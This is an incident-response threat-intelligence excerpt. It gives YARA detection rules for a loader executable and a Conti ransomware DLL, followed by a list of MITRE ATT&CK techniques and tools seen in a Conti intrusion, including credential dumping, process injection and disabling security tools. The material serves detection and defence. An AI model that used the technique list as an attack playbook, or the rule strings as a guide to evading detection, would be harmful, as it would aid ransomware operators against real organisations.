/* Rule Set ----------------------------------------------------------------- */

rule cs_exe_9438 {
   meta:
      description = "9438 - file Faicuy4.exe"
      author = "TheDFIRReport"
      reference = "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/"
      date = "2022-04-04"
      hash1 = "a79f5ce304707a268b335f63d15e2d7d740b4d09b6e7d095d7d08235360e739c"
   strings:
      $x1 = "C:\\Users\\Administrator\\Documents\\Visual Studio 2008\\Projects\\MUTEXES\\x64\\Release\\MUTEXES.pdb" fullword ascii
      $s2 = "mutexes Version 1.0" fullword wide
      $s3 = "  <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>" fullword ascii
      $s4 = ".?AVCMutexesApp@@" fullword ascii
      $s5 = ".?AVCMutexesDlg@@" fullword ascii
      $s6 = "About mutexes" fullword wide
      $s7 = "Mutexes Sample" fullword wide
      $s8 = " 1992 - 2001 Microsoft Corporation. All rights reserved." fullword wide
      $s9 = "&Process priority class:" fullword wide
      $s10 = " Type Descriptor'" fullword ascii
      $s11 = "&About mutexes..." fullword wide
      $s12 = " constructor or from DllMain." fullword ascii
      $s13 = ".?AVCDisplayThread@@" fullword ascii
      $s14 = "IsQ:\"P" fullword ascii
      $s15 = "CExampleThread" fullword ascii
      $s16 = ".?AVCCounterThread@@" fullword ascii
      $s17 = ".?AVCExampleThread@@" fullword ascii
      $s18 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
      $s19 = "CDisplayThread" fullword ascii
      $s20 = "CCounterThread" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 2000KB and
      1 of ($x*) and 4 of them
}

rule conti_dll_9438 {
   meta:
      description = "9438 - file x64.dll"
      author = "TheDFIRReport"
      reference = "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/"
      date = "2022-04-04"
      hash1 = "8fb035b73bf207243c9b29d96e435ce11eb9810a0f4fdcc6bb25a14a0ec8cc21"
   strings:
      $s1 = "AppPolicyGetProcessTerminationMethod" fullword ascii
      $s2 = "conti_v3.dll" fullword ascii
      $s3 = "  <requestedExecutionLevel level='asInvoker' uiAccess='false' />" fullword ascii
      $s4 = "api-ms-win-core-processthreads-l1-1-2" fullword wide
      $s5 = "ext-ms-win-ntuser-dialogbox-l1-1-0" fullword wide
      $s6 = " Type Descriptor'" fullword ascii
      $s7 = "operator \"\" " fullword ascii
      $s8 = "operator co_await" fullword ascii
      $s9 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
      $s10 = "api-ms-win-rtcore-ntuser-window-l1-1-0" fullword wide
      $s11 = "api-ms-win-security-systemfunctions-l1-1-0" fullword wide
      $s12 = "ext-ms-win-ntuser-windowstation-l1-1-0" fullword wide
      $s13 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide
      $s14 = " Base Class Descriptor at (" fullword ascii
      $s15 = " Class Hierarchy Descriptor'" fullword ascii
      $s16 = "bad array new length" fullword ascii
      $s17 = " Complete Object Locator'" fullword ascii
      $s18 = ".data$r" fullword ascii
      $s19 = " delete[]" fullword ascii
      $s20 = " </trustInfo>" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 700KB and
      all of them
}

MITRE

T1614.001 - System Location Discovery: System Language Discovery
T1218.010 - Signed Binary Proxy Execution: Regsvr32
T1218.011 - Signed Binary Proxy Execution: Rundll32
T1059.001 - Command and Scripting Interpreter: PowerShell
T1055 - Process Injection
T1003.001 - OS Credential Dumping: LSASS Memory
T1486 - Data Encrypted for Impact
T1482 - Domain Trust Discovery
T1021.002 - Remote Services: SMB/Windows Admin Shares
T1219 - Remote Access Software
T1083 - File and Directory Discovery
T1562.001 - Impair Defenses: Disable or Modify Tools
T1518.001 - Software Discovery: Security Software Discovery
T1047 - Windows Management Instrumentation
T1087.002 - Account Discovery: Domain Account
T1068 - Exploitation for Privilege Escalation
T1082 - System Information Discovery
T1018 - Remote System Discovery
T1053.005 - Scheduled Task/Job: Scheduled Task
T1569.002 - Service Execution
T1071.001 - Web Protocols

S0552 - AdFind
S0154 - Cobalt Strike
S0097 - Ping

Internal case #9438